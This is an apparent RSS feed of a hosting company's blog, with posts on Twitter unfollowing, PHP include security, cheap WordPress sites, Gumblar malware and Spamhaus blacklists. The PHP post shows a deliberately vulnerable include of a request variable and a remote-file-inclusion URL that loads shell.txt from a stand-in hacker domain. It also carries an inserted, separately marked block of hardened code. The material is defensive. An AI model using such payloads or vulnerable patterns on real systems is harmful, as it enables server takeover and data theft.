<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>HostNexus Blog</title>
	<atom:link href="http://www.hostnexus.com/blog/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.hostnexus.com/blog</link>
	<description>Status Updates, Rants, Musings and Real Advice for Webmasters</description>
	<lastBuildDate>Thu, 02 Sep 2010 05:16:04 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>How To Bulk Unfollow On Twitter in Minutes</title>
		<link>http://www.hostnexus.com/blog/how-to-bulk-unfollow-on-twitter/</link>
		<comments>http://www.hostnexus.com/blog/how-to-bulk-unfollow-on-twitter/#comments</comments>
		<pubDate>Tue, 06 Jul 2010 11:52:03 +0000</pubDate>
		<dc:creator>Laurence (aka NexDog)</dc:creator>
				<category><![CDATA[Web Development]]></category>

		<guid isPermaLink="false">http://www.hostnexus.com/blog/?p=492</guid>
		<description><![CDATA[I haven&#8217;t &#8220;tweeted&#8221; for a long time. I joined Twitter on the general bandwagon last year, downloaded and installed Twitter Karma but that got real old after about 100 clicks. I then start hitting checkboxes on Tweepi and Untweeps but another 150 clicks later my right index finger started to cramp up in a death [...]<p>Post from: <a href="http://www.hostnexus.com/blog">HostNexus Blog</a><br/><br/><a href="http://www.hostnexus.com/blog/how-to-bulk-unfollow-on-twitter/">How To Bulk Unfollow On Twitter in Minutes</a></p>
]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.hostnexus.com/blog/wp-content/uploads/2010/07/no-tweeps.jpg" alt="" title="no-tweeps" width="196" height="196" class="alignright size-full wp-image-498" />
<p>I haven&#8217;t &#8220;tweeted&#8221; for a long time.  I joined Twitter on the general bandwagon last year, downloaded and installed <a href="http://www.tweetdeck.com/">TweetDeck</a> &#8211; and pretty much forgot about it.  I did turn on Auto-Follow via <a href="https://www.socialoomph.com/">SocialOomph</a> though.  So a year later I have 3,000 followers and maybe 50 are HostNexus clients and people I know.  So 2,950 people have followed me for the sole reason of spamming me with links to their sites.  They don&#8217;t care what I say because, well, I say very little.  If I&#8217;m ever going to really use Twitter I need to follow only those I have a general interest in following and that is people I choose to follow and any past, present or prospective clients of HostNexus. </p>
<p>So today I went on a mission to purge my Twitter account.</p>
<p>As most people in Twitterdom know, there are thousands of apps that help you manage your Twitter account, so I thought that mass unfollowing on Twitter was going to be pretty simple.  I tried several tools but all either had no Bulk Unfollow option or no Select All option.  I started hitting Unfollow on people on <a href="http://dossy.org/twitter/karma/">Twitter Karma</a> but that got real old after about 100 clicks.  I then started hitting checkboxes on <a href="http://tweepi.com/">Tweepi</a> and <a href="http://www.untweeps.com/">Untweeps</a> but another 150 clicks later my right index finger started to cramp up in a death grip from hell.  But both Tweepi and Untweeps do not list all your followers so it was kind of pointless anyhow.  I then found <a href="http://manageflitter.com">ManageFlitter</a> which listed all your followers in pages of 100 with checkboxes, but of course no Select All option.</p>
<p>I did some digging and found out that Twitter had put their foot down on Mass Unfollowing in April of this year (2010).  All applications either had to remove Bulk Unfollow options or the Select All option to continue to operate within Twitter&#8217;s updated TOS.  Pretty ridiculous.  I can understand enforcing a Bulk Unfollow option but telling developers to remove a &#8220;Select All&#8221; option?  Very weird.  But it got me thinking.  The Select All thing is just a JavaScript call and happens in your browser so surely there should be a nifty little FireFox plugin that allows me to Select All?<br />
<span id="more-492"></span>
</p>
<p>Yes!  There is. <img src='http://www.hostnexus.com/blog/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>A plugin is available for FireFox 3.0 called <a href="https://addons.mozilla.org/en-US/firefox/addon/2708/">Check All</a> but it doesn&#8217;t work in FireFox 3.6 that I&#8217;m currently using.  After another plugin search I found an experimental plugin which is an updated version of Check All and you can find it <a href="https://addons.mozilla.org/en-US/firefox/addon/46872/">here</a>.  There is another one <a href="https://addons.mozilla.org/en-US/firefox/addon/2393/">here</a> (thanks backy).  Mozilla will give you all types of warnings about the first plugin, saying it hasn&#8217;t been verified and that your computer might grow legs and jump out the window if you install it.  It works just fine.  Install it.  Restart FireFox, rawr.</p>
</p>
<p>Next go to <a href="http://manageflitter.com">ManageFlitter</a> and login via Twitter Oauth.  Click &#8220;Show All&#8221; and you&#8217;ll be presented with a list of your followers in pages of 100 with a checkbox next to each and an Unfollow button on the left.  Hit Ctrl+A (Select All, yes baby), right click on a highlighted area and you&#8217;ll see the new plugin option &#8220;Check All Selected Checkboxes&#8221;, click Unfollow.</p>
<p>Unfollowing 100 people on Twitter in one go is a beautiful thing to behold. <img src='http://www.hostnexus.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Click Next, Ctrl+A, Right Click, Select All Checkboxes, Unfollow.  Boom, another 100 Tweeps bite the dust.  Rinse and repeat.  I got it down to 5 seconds per page, that&#8217;s a 1,000 in under a minute.  Bye Tweeps.</p>
<p><center><img src="http://www.hostnexus.com/blog/wp-content/uploads/2010/07/bye-tweeps.png" alt="" title="bye-tweeps" width="183" height="158" class="aligncenter size-full wp-image-493" /></center></p>
<p>P.S. If you&#8217;re one of the 12 invisible people I&#8217;m still following&#8230;.my hat goes off to you for evading the purge.</p>
<p>P.P.S. Damn, those Unfollow programs are quick.  600 people auto-unfollowed me already!  I&#8217;m crushed. :p </p>
]]></content:encoded>
			<wfw:commentRss>http://www.hostnexus.com/blog/how-to-bulk-unfollow-on-twitter/feed/</wfw:commentRss>
		<slash:comments>17</slash:comments>
		</item>
		<item>
		<title>PHP Security and YOU &#8211; Including files the right way</title>
		<link>http://www.hostnexus.com/blog/php-security-and-you-including-files-the-right-way/</link>
		<comments>http://www.hostnexus.com/blog/php-security-and-you-including-files-the-right-way/#comments</comments>
		<pubDate>Mon, 21 Jun 2010 08:52:50 +0000</pubDate>
		<dc:creator>Laurence (aka NexDog)</dc:creator>
				<category><![CDATA[Web Development]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.hostnexus.com/blog/?p=483</guid>
		<description><![CDATA[As a web host we fight the battle against hackers and bad code on a daily basis. So HostNexus is looking to encourage clients to use file inclusion within PHP in a more security conscious and safe manner. Including files with PHP is a common practice and most usage comes in 2 forms. These are [...]<p>Post from: <a href="http://www.hostnexus.com/blog">HostNexus Blog</a><br/><br/><a href="http://www.hostnexus.com/blog/php-security-and-you-including-files-the-right-way/">PHP Security and YOU &#8211; Including files the right way</a></p>
]]></description>
			<content:encoded><![CDATA[<p>As a web host we fight the battle against hackers and bad code on a daily basis.  So HostNexus is looking to encourage clients to use file inclusion within PHP in a more security conscious and safe manner.</p>
<p>Including files with PHP is a common practice and most usage comes in 2 forms.  These are including internal files from your own domain and including files from remote (external) sources.   This looks something like:</p>
<p>Internal:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;</span>?php
   <span style="color: #b1b100;">include</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;http://www.myowndomain.com/something.txt&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div></div>

<p>External:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;</span>?php
   <span style="color: #b1b100;">include</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;http://www.externaldomain.com/something.txt&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div></div>

<p>Both are valid syntax in the PHP world but there are two main problems we see on the servers.  Sometimes when you include a file using the URL of your local domain you can cause a PHP loop that initiates endless HTTP requests which causes server load issues and even a server crash due to the load.  If you want to include files from your local domain you just need to use the server path instead:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;</span>?php
   <span style="color: #b1b100;">include</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'/home/httpd/vhosts/myowndomain.com/httpdocs/something.txt'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div></div>

<p>And now onto using include() for calling external files:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;</span>?php
   <span style="color: #b1b100;">include</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;http://www.externaldomain.com/something.txt&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div></div>

<p>The main problem with include() is that it runs everything it loads through the PHP parser and evaluates it as code.  The danger comes from passing a variable to include(), which can be easily exploited.  Here is an example of code in an index.php:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;</span>?php
    <span style="color: #b1b100;">echo</span> <span style="color: #0000ff;">&quot;&lt;html&gt;<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span>
    <span style="color: #b1b100;">echo</span> <span style="color: #0000ff;">&quot;  &lt;body&gt;<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span>
    <span style="color: #b1b100;">include</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;<span style="color: #006699; font-weight: bold;">$go</span>&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
    <span style="color: #b1b100;">echo</span> <span style="color: #0000ff;">&quot;  &lt;/body&gt;<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span>
    <span style="color: #b1b100;">echo</span> <span style="color: #0000ff;">&quot;&lt;/html&gt;<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span>
<span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div></div>

<p>The $go variable above is easily exploited like:</p>
<p>http://myowndomain.com/index.php?go=http://www.hackerdomain.com/shell.txt</p>
<p>The hacker can now execute commands on your files, installing phishing sites, sending spam and stealing data.</p>
<p>If you want to include files from remote domains use PHP&#8217;s readfile() function instead:</p>
<p><a href="http://www.php.net/manual/en/function.readfile.php">http://www.php.net/manual/en/function.readfile.php</a></p>
<p>While not 100% secure it still provides more protection as readfile() simply outputs data to a browser rather than parsing everything as PHP.</p>
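<p>An added example, not code from the original post: the index.php pattern above rewritten so the go parameter is only a lookup key into a fixed list of local files, with remote content sent through readfile() so it is never parsed as PHP.  The page keys, the pages/ directory and the helper functions resolve_page() and emit_remote() are assumptions made for illustration.</p>

```php
<?php
// Added example, not code from the original post. The page keys, the pages/
// directory and both helper functions are hypothetical names.
//
// Vulnerable pattern shown in the post, for comparison only:
//     include("$go");   // request value decides what gets parsed as PHP

/**
 * Map the request value onto a fixed set of local files.
 * Returns an absolute path under $baseDir, or null when the value is not allowed.
 */
function resolve_page($requested, $baseDir)
{
    // The request value is only ever used as a lookup key, never as a path or URL.
    $allowed = array(
        'home'    => 'home.php',
        'about'   => 'about.php',
        'contact' => 'contact.php',
    );
    if (!is_string($requested) || !isset($allowed[$requested])) {
        return null;
    }

    // realpath() returns false for a missing file and resolves symlinks,
    // so the prefix check confirms the file really lives under $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $allowed[$requested]);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Output remote content as data. readfile() copies the bytes to the browser
 * without running them as PHP. The URL is a constant, never user input.
 * The bytes still reach the visitor unescaped, so only use a source you trust.
 */
function emit_remote($url)
{
    $ctx = stream_context_create(array('http' => array('timeout' => 5)));
    return @readfile($url, false, $ctx);   // returns false on failure
}

// Resolve the page before any output so the 404 header can still be sent.
$go   = isset($_GET['go']) ? $_GET['go'] : 'home';
$page = resolve_page($go, __DIR__ . '/pages');
if ($page === null) {
    header('HTTP/1.0 404 Not Found');
}

echo "<html>\n";
echo "  <body>\n";
if ($page !== null) {
    include $page;                          // local, allowlisted file only
} else {
    echo "    <p>Page not found.</p>\n";
}
emit_remote('http://www.externaldomain.com/something.txt');
echo "  </body>\n";
echo "</html>\n";
```

<p>With this in place, a request such as index.php?go=http://... simply fails the lookup and returns the 404 page.  Setting allow_url_include = Off in php.ini additionally makes include() refuse http:// URLs outright.</p>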
<p>We&#8217;d love to enforce the two practices above but we also understand not everyone is happy modifying code.  However, if you know you use includes and have even a simple understanding of these functions then please do revisit your code and help yourself to secure your data and server.</p>
<p>Laurence </p>
]]></content:encoded>
			<wfw:commentRss>http://www.hostnexus.com/blog/php-security-and-you-including-files-the-right-way/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How To Get A Professional Website Online Within One Week, For Less Than $199, And No Design Experience</title>
		<link>http://www.hostnexus.com/blog/how-to-get-a-professional-website-online-within-one-week-for-less-than-199-and-no-design-experience/</link>
		<comments>http://www.hostnexus.com/blog/how-to-get-a-professional-website-online-within-one-week-for-less-than-199-and-no-design-experience/#comments</comments>
		<pubDate>Wed, 14 Apr 2010 07:42:10 +0000</pubDate>
		<dc:creator>Laurence (aka NexDog)</dc:creator>
				<category><![CDATA[Web Development]]></category>

		<guid isPermaLink="false">http://www.hostnexus.com/blog/?p=464</guid>
		<description><![CDATA[The main hurdles most people face when thinking about getting a decent website up is that it is too expensive and/or requires certain nerdy technical skills such as graphic design or some kind of coding skills. And quotes from web design firms of $500 to $50,000 definitely serve to discourage many from developing an online [...]<p>Post from: <a href="http://www.hostnexus.com/blog">HostNexus Blog</a><br/><br/><a href="http://www.hostnexus.com/blog/how-to-get-a-professional-website-online-within-one-week-for-less-than-199-and-no-design-experience/">How To Get A Professional Website Online Within One Week, For Less Than $199, And No Design Experience</a></p>
]]></description>
			<content:encoded><![CDATA[<p>The main hurdles most people face when thinking about getting a decent website up is that it is too expensive and/or requires certain nerdy technical skills such as graphic design or some kind of coding skills.  And quotes from web design firms of $500 to $50,000 definitely serve to discourage many from developing an online corporate presence or even putting up a personal website.</p>
<p>Ten or even five years ago putting up a website was expensive and took time.  But times have changed and time, money and skills (or lack thereof) are no longer obstacles would-be webmasters have to deal with.  If you&#8217;ve ever thought about getting a nice website online but have always dreaded the task, here are my 7 Steps To Get Online.</p>
<p><span id="more-464"></span></p>
<h2>1) Register Your Domain Name</h2>
<p>This is always the starting point for any new website project.  Your website will need a name so register a domain.  This will be less than $15 for the year.  HostNexus, for example, sells .com domains for $12.95/yr from our registry site <a href="http://nexusdomains.net">NexusDomains</a>.  Unless you are looking for a specific country TLD such as .com.au or .co.uk then I always recommend you try and get the .com AND the .net.  Usually if a .com is registered and in use I would not register the .net to ensure against brand dilution but there are always exceptions (such as our NexusDomains on a .net).</p>
<h2>2) Get Some Simple Web Hosting</h2>
<p>We&#8217;ll be using WordPress and this works best on Linux Hosting.  So before you start find a <a href="http://www.hostnexus.com">Cheap Hosting</a> plan such as our entry level <a href="http://www.hostnexus.com/solutions/linux-hosting.php">nexusONE</a> plan.  This will be your first expense and will cost you less than $50 for the year.  You could even cut down costs more and get hosting on a monthly plan but the yearly costs will usually end up being more (such as $7.95/mo).</p>
<h2>2) Install WordPress</h2>
<p>WordPress is the de-facto blogging software these days but it is much more than a blog.  WordPress has evolved into a full-blown Content Management System (CMS) and the possibilities with it are endless.  Installing it is incredibly simple and most hosts (including HostNexus) provide an auto-installer for many popular programs including WordPress.  If you have issues with the install your hosting company will certainly assist you (if not, well you should be with HN of course).</p>
<h2>3) Find And Install A WordPress Theme</h2>
</p>
<p>This is where the fun starts.  A WordPress theme these days is much more than a simple skin for WordPress.  The theme will control a lot of your site&#8217;s functionality as WordPress developers include many custom scripts and programs with their themes.  The best place on the internet for WordPress themes is undoubtedly <a href="http://www.themeforest.com">ThemeForest</a>.  There are literally hundreds of amazing themes there and more are added almost daily.  ThemeForest is a place where developers showcase their work so there are many developers and most provide good support in Q&#038;A threads on their showcase pages.  I have personally bought 3 themes there for personal projects and recommend it highly.  Themes vary in price with $35 being the most expensive so not very expensive at all.</p>
<p>Theme install consists of uploading the theme folder and activating it in the WordPress admin panel.  Easy stuff that we love. </p>
<p>So to recap we have $12.95 for a domain name, less than $47.40 for hosting and $35 max for a theme.  We are at under $100 and a few hours into our project.</p>
<h2>4) Find A Logo Designer</h2>
<p>Having a great logo is essential for all corporate sites and recommended even for personal sites.  You could spend literally hundreds of dollars on a logo for your site but that is just not necessary.  When I start up a new site I normally hire 3 different logo designers so I have many concepts to choose from.  Last year I hired 4 logo designers for a project ranging from $20 to $200 per designer.  And believe it or not I ended up choosing a logo developed for $29.  Here are a few designers I&#8217;ve worked with and all cost less than $30:</p>
<ul>
<li><a href="http://www.19dollarlogos.com">19dollarlogos.com</a></li>
<li><a href="http://www.iigfx.net">iigfx.net</a></li>
<li><a href="http://www.20dollarlogo.com">20dollarlogo.com</a></li>
<li><a href="http://www.logonerds.com">logonerds.com</a></li>
</ul>
<p>Find a designer that will include at least 2 different concepts.  For best results hire 2 different designers so you get at least 4 fresh concepts.</p>
<h2>5) Find A WordPress Designer</h2>
<p>So you have your domain, hosting, installed WordPress, purchased a great theme and you have a nice logo.   However, it is unlikely that your theme will be exactly the way you want it.  You may want to change a colour here, put an image there, add a button over there, customise the styling on this or that page.  As you play around with your WordPress install and upload content you&#8217;ll start to formulate a list of things that you want to change.  And it&#8217;s always a good idea to change your theme a bit so that your design is unique as it&#8217;s likely that 50 or 100 other sites might be using the same theme.  So the final step is to find a designer that will do all of your modifications.  I usually find designers on <a href="http://www.forum.digitalpoint.com">forum.digitalpoint.com</a>.  Post a thread in the Buy/Sell > Services > Design forum and wait for offers.  Generally you can get small WordPress theme modifications done for around $50.  Select your provider carefully!  Choose a designer with an established website with portfolio and lots of positive feedback as there are a few unsavoury and unreliable people haunting the forum.  Arrange to pay half in advance and half on completion of the job.  Payment is always by PayPal.</p>
<h2>6) Publish Your Content</h2>
<p>You can start plugging in your content as soon as you&#8217;ve installed WordPress and can continue while designers work on your logo and WordPress modifications.  Publish your pages and articles and you&#8217;re done!</p>
<p>And there you have it.  A professional, great looking website complete with logo online in less than a week and less than $199.  So what&#8217;s stopping you?  Get out there and start building your online presence.  Who knows where it will lead you. <img src='http://www.hostnexus.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.hostnexus.com/blog/how-to-get-a-professional-website-online-within-one-week-for-less-than-199-and-no-design-experience/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Gumblar &#8211; How To Avoid Getting Hacked</title>
		<link>http://www.hostnexus.com/blog/gumblar-how-to-avoid-getting-hacked/</link>
		<comments>http://www.hostnexus.com/blog/gumblar-how-to-avoid-getting-hacked/#comments</comments>
		<pubDate>Mon, 05 Oct 2009 14:37:13 +0000</pubDate>
		<dc:creator>Laurence (aka NexDog)</dc:creator>
				<category><![CDATA[Web Hosting]]></category>
		<category><![CDATA[Anti-Virus]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[Gumblar]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://www.hostnexus.com/blog/?p=368</guid>
		<description><![CDATA[2009 is The Year Of The Gumblar. You might not know the name but I&#8217;m sure you&#8217;ve experienced it either directly (hopefully not) or indirectly. Have you ever been surfing and come across a page with a big red sign warning against you entering the site? If you have then it&#8217;s a good chance that [...]<p>Post from: <a href="http://www.hostnexus.com/blog">HostNexus Blog</a><br/><br/><a href="http://www.hostnexus.com/blog/gumblar-how-to-avoid-getting-hacked/">Gumblar &#8211; How To Avoid Getting Hacked</a></p>
]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.hostnexus.com/blog/wp-content/uploads/2009/10/attack_site.gif" alt="attack_site" title="attack_site" width="620" height="302" class="aligncenter size-full wp-image-367" /></p>
<p>2009 is The Year Of The Gumblar.  You might not know the name but I&#8217;m sure you&#8217;ve experienced it either directly (hopefully not) or indirectly.  Have you ever been surfing and come across a page with a big red sign warning against you entering the site?  If you have then it&#8217;s a good chance that site was hit with Gumblar or one of its variants like Nine Ball, Martuz or a host of other weird and wonderful names.  If you run a successful online business can you imagine the damage such an attack could do?  I actually got hit with it on a personal site I just use for storing photos.  But when I thought of the damage it would have done if it had hit HostNexus&#8230;&#8230;it certainly got my attention.</p>
<p>So what is Gumblar and how does it work?  These are things EVERY webmaster MUST know!  The original Gumblar used a vulnerability in Adobe Acrobat and Flash player but subsequent variants use other exploitable software but all have the same end result.  I won&#8217;t go into the <a href="http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p5.html">technicalities</a> of how your computer gets infected but you need to know what it does.  Once infected it listens in on any FTP connections and steals the connection information.  Usually within minutes the virus uses your FTP account to modify files and insert some nasty code.  This code is normally an iframe, javascript or some other code that triggers a malware download from another computer.</p>
<p>The virus will sometimes modify PHP code and insert phpshell scripts which in turn attempt to install the malware that other infected sites connect to to trigger malware downloads to unsuspecting site visitors.  This is a three-pronged nightmare that just grows exponentially.  From local computer to FTP account to server infection and the wheel keeps on turning.  So what&#8217;s the defence?</p>
<p>The virus is three-pronged and therefore everyone needs to cover as many of these vulnerabilities as possible.</p>
<p><strong>1) Your Computer</strong> &#8211; a decent &#8220;On-Access&#8221; anti-virus program is all you need.  When I got infected I was running a cheap AV program that wasn&#8217;t On-Access.  This simply means the AV program automatically scans anything that is downloaded to your computer or any file that you open on your computer.  If your anti-virus just gives you a daily scan you are NOT protected.  You could get infected, download some nasty stuff to your computer and proliferate the virus before you even get to your daily scan.</p>
<p><strong>2) FTP over SSL.</strong>  If you are on a linux server simply choose a connection option in your FTP program that is encrypted or just says &#8220;SSL&#8221;.  All of our shared servers should have this working.  If you find it doesn&#8217;t please contact Support and we will fix it!  With this option your connection info is sent encrypted and not in plain text and the virus cannot sniff it out.  We would love to implement this by default (forcing people to use it) but even though we could post about it in a newsletter, on a mail list, on our blog and on our forum we will still get hundreds of tickets asking why their FTP doesn&#8217;t work.  As awareness grows maybe we will implement slowly.</p>
<p>If you have a dedicated server and would like FTP over SSL activated please contact <a href="http://www.hostnexus.com/support/">Support</a>.</p>
<p>Bad news for Windows clients on this front.  Our Windows servers don&#8217;t currently support FTP over SSL as this is a feature included in the newer Windows 2008 OS with IIS7.  It&#8217;s a huge change and one that we aren&#8217;t quite ready for.  But you can still install a decent Anti-Virus program. <img src='http://www.hostnexus.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><strong>3) Server Infection</strong> &#8211; this is one area where Windows servers aren&#8217;t as vulnerable.  The virus uses PHP which needs to be running as a global user such as Apache.  PHP on Windows has run under a user&#8217;s FTP username as CGI for ages so even if files get infected the virus cannot break out of the user&#8217;s home directory.  On linux though PHP has run as Apache for aeons and it&#8217;s only with later versions of Plesk that we now have the option to run PHP as CGI or FastCGI.  So if you&#8217;re on Plesk 9 I encourage you to switch PHP to a Fast CGI application under Web Host Settings for the domain.  Some scripts can break with it so if you are not sure please don&#8217;t hesitate to contact support and we will advise you.  Scripts tend to run faster under Fast CGI too so you are in fact doing yourself a service. <img src='http://www.hostnexus.com/blog/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>This year we&#8217;ve been dealing with Gumblar related issues almost on a weekly basis.  It is very hard to convince someone that the server hasn&#8217;t been hacked when their website is showing the Reported Attack Site page.  In these cases the issue almost always lies with the user&#8217;s computer being infected.</p>
<p>But we have also had cases where the virus has spread through Apache-owned PHP files causing malicious downloads and random page redirects to search results containing a list of infected sites.  We can always track down the source but it is very frustrating for us as hosts and our users.  In this case a solution would be to force every domain using PHP to run as Fast CGI but as with the FTP solution there would be even more fallout.  So it&#8217;s a balancing tightrope act with a bit of a dodgy safety net.  All we can do as hosts is raise our own community&#8217;s awareness of this problem that doesn&#8217;t seem to be going away any time soon and hope that in the future we can implement stricter safeguards against this menace.</p>
<p>I just posted this on our blog so feel free to comment there.  If you&#8217;d prefer to discuss any of this in our <a href="http://www.hostnexus.com/forum/">forum</a> that would also be most welcome.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.hostnexus.com/blog/gumblar-how-to-avoid-getting-hacked/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The zen of SpamHaus</title>
		<link>http://www.hostnexus.com/blog/the-zen-of-spamhaus/</link>
		<comments>http://www.hostnexus.com/blog/the-zen-of-spamhaus/#comments</comments>
		<pubDate>Sat, 26 Sep 2009 10:50:21 +0000</pubDate>
		<dc:creator>Laurence (aka NexDog)</dc:creator>
				<category><![CDATA[Web Hosting]]></category>

		<guid isPermaLink="false">http://www.hostnexus.com/blog/?p=338</guid>
		<description><![CDATA[(Somewhat long but scroll to the bottom for the important parts if pressed for time) How would you like to reduce the amount of spam coming into your mailbox by 90%? Yes&#8230;..90%. It can be done and it can be done very easily but for many the price might be too high.  See, the fight against [...]<p>Post from: <a href="http://www.hostnexus.com/blog">HostNexus Blog</a><br/><br/><a href="http://www.hostnexus.com/blog/the-zen-of-spamhaus/">The zen of SpamHaus</a></p>
]]></description>
			<content:encoded><![CDATA[<p>(Somewhat long but scroll to the bottom for the important parts if pressed for time)</p>
<p><img class="alignleft2 size-full wp-image-339" title="nospam" src="http://www.hostnexus.com/blog/wp-content/uploads/2009/09/nospam.gif" alt="nospam" width="300" height="300" /></p>
<p>How would you like to reduce the amount of spam coming into your mailbox by 90%?</p>
<p><strong>Yes&#8230;..90%.</strong></p>
<p>It can be done and it can be done very easily but for many the price might be too high.  See, the fight against spam is kind of a catch 22.  There is no solution out there that, even if it works great, won&#8217;t aggravate some users.  For web hosts this is particularly painful.  A host&#8217;s client base often demands less spam but in my experience they are unwilling to pay the price.  This is why most hosts just let the email flow and give their clients end-user tools with which to fight spam &#8211; and on the whole it works well.  By using SpamAssassin and some filters I generally don&#8217;t see much spam in my inbox.  On average maybe 5-10 per day.  The rest gets tagged and filtered.  I can certainly live with that &#8211; but some people can&#8217;t.<br />
<span id="more-338"></span><br />
So what other options are available to us as a <a href="http://www.hostnexus.com/">web hosting provider</a>?  The most popular option is to use Blacklists.  These are lists generated and maintained by external providers.  We can set our servers to check incoming mail against these lists and if the sender is listed we reject the mail.  The most popular list is <a href="http://www.spamcop.net/">SpamCop</a> which I&#8217;m sure almost everyone has heard of.  There are literally hundreds of lists out there.  Some are public, some are private, some are good and some are terrible.  There are some lists where, once you are on them, you simply can&#8217;t get removed or have to pay to be removed.  These are the bad ones, but lists like SpamCop are good as you can delist, and on some the entry delists automatically if your server doesn&#8217;t send any more spam.  SpamCop works like this and it works well but it is far from perfect.  Even with SpamCop your server can accept a lot of spam.</p>
<p><img src="http://www.hostnexus.com/blog/wp-content/uploads/2009/09/logo_spamhaus.jpg" alt="logo_spamhaus" title="logo_spamhaus" width="170" height="126" class="alignright2 size-full wp-image-350" /></p>
<p>Another great Blacklist is <a href="http://www.spamhaus.org/">SpamHaus</a> and we have this deployed on all servers.  However, there are different levels of spam protection that are offered by SpamHaus:</p>
<p><strong>1) The Spamhaus Block List &#8211; sbl.spamhaus.org.</strong></p>
<p>In their own words:</p>
<blockquote><p>The SBL is a realtime database of IP addresses of verified spam sources and spam operations (including spammers, spam gangs and spam support services), maintained by the Spamhaus Project team and supplied as a free service to help email administrators better manage incoming email streams.</p></blockquote>
<p><strong>2) The Exploits Block List &#8211; xbl.spamhaus.org.</strong></p>
<p>To quote:</p>
<blockquote><p>The Spamhaus Exploits Block List (XBL) is a realtime database of IP addresses of hijacked PCs infected by illegal 3rd party exploits, including open proxies (HTTP, socks, AnalogX, wingate, etc), worms/viruses with built-in spam engines, and other types of trojan-horse exploits.</p></blockquote>
<p>It&#8217;s basically a list that incorporates two other RBLs &#8211; cbl.abuseat.org and www.njabl.org.</p>
<p>We use both of these as standard and query SpamHaus using sbl-xbl.spamhaus.org.</p>
<p><strong>3) The Policy Block List &#8211; pbl.spamhaus.org.</strong></p>
<p>This is what sets SpamHaus apart from all the other RBLs.  To quote <a href="http://www.spamhaus.org/pbl/index.lasso">their site</a>:</p>
<blockquote><p>The Spamhaus PBL is a DNSBL database of end-user IP address ranges which should not be delivering unauthenticated SMTP email to any Internet mail server except those provided for specifically by an ISP for that customer&#8217;s use. The PBL helps networks enforce their Acceptable Use Policy for dynamic and non-MTA customer IP ranges.</p></blockquote>
<p>If you use all 3 Blacklists together, that is zen.spamhaus.org.  We put zen.spamhaus.org on some servers a few weeks ago but right away we got complaints from users who couldn&#8217;t send mail because their ISP was listed in pbl.spamhaus.org.  Remember that most spam on the net doesn&#8217;t come from servers like we run but it comes from viruses on people&#8217;s computers that send spam via Outlook unbeknownst to the infected user.  So yes, many ISP IPs are listed and for good reason &#8211; 95% of all spam originates from sources like this.</p>
<p>So we removed zen.spamhaus.org and kept sbl-xbl.spamhaus.org.  I thought it best that all users at HostNexus get involved and we have a community discussion before implementing it again.  But remember, even if you find you can&#8217;t send mail due to being listed by zen all you need do is follow the link in the bounced mail failure and delist your IP &#8211; it is really simple.  To quote SpamHaus again:</p>
